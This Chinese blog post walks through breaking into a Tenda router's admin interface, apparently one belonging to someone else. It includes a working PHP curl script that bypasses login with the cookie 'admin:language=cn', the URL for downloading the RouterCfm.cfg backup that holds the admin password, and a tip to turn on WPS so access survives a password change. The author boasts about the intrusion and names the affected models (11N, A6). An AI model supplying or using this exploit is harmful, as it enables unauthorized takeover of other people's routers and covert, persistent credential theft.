这个故事很长，可惜只有风听我讲……

在一个寂静的夜晚，我连上了某台腾达路由器，型号什么的看图，然后接上网线，连通电脑，保持本地网络畅通。

PS：还有一种情况，就是连上了某个腾达wif。

默默地用浏览器打开了网关，来到了登陆界面：http://192.168.0.1/login.asp

乍眼一看，这这这...不是跟乌云的那个腾达漏洞差不多嘛？

然后我测试了一下从index.asp跳转到login.asp 果然没有cookies，那么就应该是那个漏洞了。

然后利用php的curl写了个简单的脚本：

<?php
echo "找到路由的备份文件就好了，密码就在里面。腾达的备份文件是RouterCfm.cfg。在工具的地址栏输入：http://192.168.0.1/cgi-bin/DownloadCfg/RouterCfm.cfg，然后点获取当前地址源码。http_passwd就是登陆密码".'<br>';
$headers = array(
 // 'GET /index.asp HTTP/1.1',
    'Host: 192.168.0.1',
    'Cookie: admin:language=cn;',

);
$url='http://192.168.0.1/index.asp';
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 120);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
 ?>

 

运行后的结果如下：

一目了然，然后Ctrl+U 查看一下网页的源代码

但是很不幸啊，这个路由器是静态IP或者是动态获取IP，找不到宽带账号和密码，从图中看到密码是88888888，下载配置文件后，就可以看到后台的登陆密码了：

 

好气，现在科技那么发达，怎么还用那么烂的路由器，害我白白浪费那么多时间，用这破路由器就算了，居然还不用宽带上网，也是66666啊。

那么，上图中，http_passwd= 这后面的就是路由器后台登陆密码，也可以不下载配置文件直接在后台改登陆密码的，只是要是用这个路由器的人有点头脑，就容易被发现。进了管理界面之后，如果有wps功能就打开，这样的话即使他把密码改了，通过wps还是可以轻松拿到密码....哈哈。

其实这个漏洞在几年前就出来了，而且很多软件都能一键破解。

有人又要问我，既然那么久的东西现在才发出来，有何用心？

答：别人能装逼，为什么我就不能装逼？呸呸呸，那是因为有人在炫耀他的技术，而我只是把这个炫耀的资本分享给大家罢了。

而且，这是纯手动的，最纯正的，可不是谁谁谁，用个软件，加个语句，就拿出来...只能说大叔你路由器该换了。

哦对了，乌云报道的关于腾达的后台登陆漏洞是：admin:language=cn

总结一下就是：使用Cookie注入绕过密码登录Tenda路由管理页 

此方法适用于：腾达路由器11N、腾达路由器A6（如上图）其余腾达未测试。